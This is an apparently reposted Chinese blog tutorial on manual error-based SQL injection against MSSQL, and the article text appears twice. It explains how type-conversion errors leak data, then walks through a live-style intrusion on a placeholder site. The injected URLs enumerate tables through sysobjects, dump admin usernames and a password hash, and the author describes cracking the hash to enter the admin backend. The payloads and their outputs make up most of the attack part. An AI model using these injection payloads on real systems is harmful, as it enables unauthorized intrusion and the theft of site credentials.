MSSQL显错模式的手工注入实现原理思考和实战
2009-10-03 19:56
405 查看
by Ay暗影
说到Mssql手工注入,本人喜欢显错模式的,为啥呢,因为你只要构造一个语句,不用你一个一个特意的去猜,程序会自动告诉你我们要的信息,省时省力,不像不显错模式的盲注,可以让你猜上个半天。进入正题,下面来说说我对显错模式原理的思考。
显错模式,起初也是为了方便程序员修改代码,但是,这正好被我们利用了,我们故意让程序出错来爆出我们要的敏感信息。
上次我说到过having 1=1 和group by的显错模式是通过语法错误来达到我们的目的,这次我说的出错是数据转换出错,就是通过数据转换让数据发生溢出来完成我们的动作。
我们应该都听说数据类型,比如int,char,等等。。。当我们定义好一个数据时,也就定义好了一个数据的长度,比如,int 型是4个字节的长度,如果一个数据超过了4个字节的长度的话,该数据就会发生溢出而失去准确性,从而编译软件会显示出错信息。
在数据转换时有个规则,就是短的可以转换成长的,但是长的不能转换成短的,什么意思呢,就是比如数据库中有整型数据tinyint(一个字节长度)、smallint(两个字节长度)、int(四个字节长度),tinyint可以向上转化成smallint、int而不会出错,但是不能反向转化把int转化为smallint和tinyint,否则会发生数据溢出。为啥呢,这个应该很容易理解,一个数据本来是4个字节长度的,转换成2个字节长度的数据类型的话,这个2个字节的空间就装不下了,数据就丢失了,同理,反过来就可以了,2个字节的数据可以换到4个字节的空间里,数据是不会丢失出错的。
我在使用这个方法时用到下面两个函数
数据转换函数
convert(数据类型,表达式(就是要转换的对象))
cast(表达式 as 数据类型)
在注入时我们要用到的语句:
因为光是用group by 和having 不能完成我们的检测过程,所以我们要配合其他系统函数的查表功能,因为上面必须要知道表名才能利用
第一种函数
select name from sysobjects where xtype='u' 通过这个来爆第一个表
select name from sysobjects where xtype='u' and name not in('爆出来的表1','爆出来的表2'...)
一直爆下去,直到找到我们所需要的表位置
第二种函数
select table_name from information_schema.tables
select table_name from information_schema.tables where table_name not in ('爆出来的表1','爆出来的表2'...)。
实战练习
目标 http://www.xxx.com/shownews.aspx?id=3
首先拿个到一个注入点,我们要判断是什么类型的数据库mssql还是access或者其他。
一、我们提交
http://www.xxx.com/shownews.aspx?id=3 and user>0
我们得到用户名是:Jxb_Ojc_Zj_Cn
二、我们提交
http://www.xxx.com/shownews.aspx?id=3 and db_name()>0
得到数据库也是:Jxb_Ojc_Zj_Cn
三、继续提交
http://www.xxx.com/shownews.aspx?id=3 and 1=convert(int,(select top 1 name from sysobjects where xtype=’u’ and status>0))
根据返回的结果,应该不是我们要的表
四、接着提交(这中间省了好多步相同操作,直到发现很有可能存放用户名的表)
http://www.xxx.com/shownews.aspx?id=3 and 1=convert(int,(select top 1 name from sysobjects where xtype=’u’ and status>0 and name not in ('FM_Page_Class’, 'D99_Tmp', 'D99_CMD')))
哈哈,之前有人用啊D检测过。。。
五、确定了表明之后,我们来利用having 1=1 来爆出表里的列明
提交 http://www.xxx.com/shownews.aspx?id=3 select * from FM_admin having 1=1
爆出了所有的列名,哈哈,不过一般情况下是只爆出一个列,那就要用到group by了。
六、整理下我们手上的资料,我们得到了表和列,那我们就要开始爆它字段的内容了
提交: http://www.xxx.com/shownews.aspx?id=3 and 1=convert(int,(select top 1 adminname from fm_admin))
爆出了用户名:admin
接着提交: http://www.xxx.com/shownews.aspx?id=3 and 1=convert(int,(select top 1 password from fm_admin))
爆出了密码:BD2C2**********BF2F4284BFDA1
当然,还有其他密码,我们可以加一个限制条件来爆出其他用户名和密码,
分别提交: http://www.xxx.com/shownews.aspx?id=3 and 1=convert(int,(select top 1 adminname from fm_admin where username not in (‘admin’)))
http://www.xxx.com/shownews.aspx?id=3 and 1=convert(int,(select top 1 password from fm_admin where adminname not in (‘admin’)))
当然,这个where的限制条件可以自己变通下加,这个就看大家怎么想了,哈。
接下来其他的用户名和密码我就不爆了,还有很多个用户名和密码,方法同上,重复操作。
七、拿用户名和密码进后台
拿着爆出来的md5加密的密码去破解下,运气好,第一个密码就解了
然后就是拿密码进后台了
入侵就到这里了,拿shell我就不写下去了,哈哈。
希望这篇文章对大家有用处
说到Mssql手工注入,本人喜欢显错模式的,为啥呢,因为你只要构造一个语句,不用你一个一个特意的去猜,程序会自动告诉你我们要的信息,省时省力,不像不显错模式的盲注,可以让你猜上个半天。进入正题,下面来说说我对显错模式原理的思考。
显错模式,起初也是为了方便程序员修改代码,但是,这正好被我们利用了,我们故意让程序出错来爆出我们要的敏感信息。
上次我说到过having 1=1 和group by的显错模式是通过语法错误来达到我们的目的,这次我说的出错是数据转换出错,就是通过数据转换让数据发生溢出来完成我们的动作。
我们应该都听说数据类型,比如int,char,等等。。。当我们定义好一个数据时,也就定义好了一个数据的长度,比如,int 型是4个字节的长度,如果一个数据超过了4个字节的长度的话,该数据就会发生溢出而失去准确性,从而编译软件会显示出错信息。
在数据转换时有个规则,就是短的可以转换成长的,但是长的不能转换成短的,什么意思呢,就是比如数据库中有整型数据tinyint(一个字节长度)、smallint(两个字节长度)、int(四个字节长度),tinyint可以向上转化成smallint、int而不会出错,但是不能反向转化把int转化为smallint和tinyint,否则会发生数据溢出。为啥呢,这个应该很容易理解,一个数据本来是4个字节长度的,转换成2个字节长度的数据类型的话,这个2个字节的空间就装不下了,数据就丢失了,同理,反过来就可以了,2个字节的数据可以换到4个字节的空间里,数据是不会丢失出错的。
我在使用这个方法时用到下面两个函数
数据转换函数
convert(数据类型,表达式(就是要转换的对象))
cast(表达式 as 数据类型)
在注入时我们要用到的语句:
因为光是用group by 和having 不能完成我们的检测过程,所以我们要配合其他系统函数的查表功能,因为上面必须要知道表名才能利用
第一种函数
select name from sysobjects where xtype='u' 通过这个来爆第一个表
select name from sysobjects where xtype='u' and name not in('爆出来的表1','爆出来的表2'...)
一直爆下去,直到找到我们所需要的表位置
第二种函数
select table_name from information_schema.tables
select table_name from information_schema.tables where table_name not in ('爆出来的表1','爆出来的表2'...)。
实战练习
目标 http://www.xxx.com/shownews.aspx?id=3
首先拿个到一个注入点,我们要判断是什么类型的数据库mssql还是access或者其他。
一、我们提交
http://www.xxx.com/shownews.aspx?id=3 and user>0
我们得到用户名是:Jxb_Ojc_Zj_Cn
二、我们提交
http://www.xxx.com/shownews.aspx?id=3 and db_name()>0
得到数据库也是:Jxb_Ojc_Zj_Cn
三、继续提交
http://www.xxx.com/shownews.aspx?id=3 and 1=convert(int,(select top 1 name from sysobjects where xtype=’u’ and status>0))
根据返回的结果,应该不是我们要的表
四、接着提交(这中间省了好多步相同操作,直到发现很有可能存放用户名的表)
http://www.xxx.com/shownews.aspx?id=3 and 1=convert(int,(select top 1 name from sysobjects where xtype=’u’ and status>0 and name not in ('FM_Page_Class’, 'D99_Tmp', 'D99_CMD')))
哈哈,之前有人用啊D检测过。。。
五、确定了表明之后,我们来利用having 1=1 来爆出表里的列明
提交 http://www.xxx.com/shownews.aspx?id=3 select * from FM_admin having 1=1
爆出了所有的列名,哈哈,不过一般情况下是只爆出一个列,那就要用到group by了。
六、整理下我们手上的资料,我们得到了表和列,那我们就要开始爆它字段的内容了
提交: http://www.xxx.com/shownews.aspx?id=3 and 1=convert(int,(select top 1 adminname from fm_admin))
爆出了用户名:admin
接着提交: http://www.xxx.com/shownews.aspx?id=3 and 1=convert(int,(select top 1 password from fm_admin))
爆出了密码:BD2C2**********BF2F4284BFDA1
当然,还有其他密码,我们可以加一个限制条件来爆出其他用户名和密码,
分别提交: http://www.xxx.com/shownews.aspx?id=3 and 1=convert(int,(select top 1 adminname from fm_admin where username not in (‘admin’)))
http://www.xxx.com/shownews.aspx?id=3 and 1=convert(int,(select top 1 password from fm_admin where adminname not in (‘admin’)))
当然,这个where的限制条件可以自己变通下加,这个就看大家怎么想了,哈。
接下来其他的用户名和密码我就不爆了,还有很多个用户名和密码,方法同上,重复操作。
七、拿用户名和密码进后台
拿着爆出来的md5加密的密码去破解下,运气好,第一个密码就解了
然后就是拿密码进后台了
入侵就到这里了,拿shell我就不写下去了,哈哈。
希望这篇文章对大家有用处
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- MSSQL显错模式的手工注入实现原理思考和实战
- MSSQL显错模式的手工注入实现原理思考和实战
- Command Pattern -- 命令模式原理及实现(C++)
- Java设计模式之代理模式原理及实现代码分享
- 基于.NET平台的分层架构实战(六)——依赖注入机制及IoC的设计与实现
- (转-收集)MSSQL手工注入语句集合
- spring 依赖注入原理代码实现
- 实战设计模式之用组合模式实现JSON(七)
- vmware nat模式原理探究,实现虚拟机跨网段管理
- 动态代理模式实现原理
- Java设计模式——代理模式实现及原理(基于java8)
- Hibernate4实战 之第六部分:基本实现原理
- Python 实现单例模式的一些思考
- KMP模式匹配算法原理分析、next数组优化及java实现
- Spring获取Bean对象以及依赖注入的实现原理
- Hibernate4实战 之第六部分:基本实现原理
- turbochen(原作)设计模式:实战MVC模式(swing 实现)
- mssql数据库的手工注入
- 对ThreadLocal实现原理的一点思考
- 第32讲:List的基本操作实战与基于模式匹配的List排序算法实现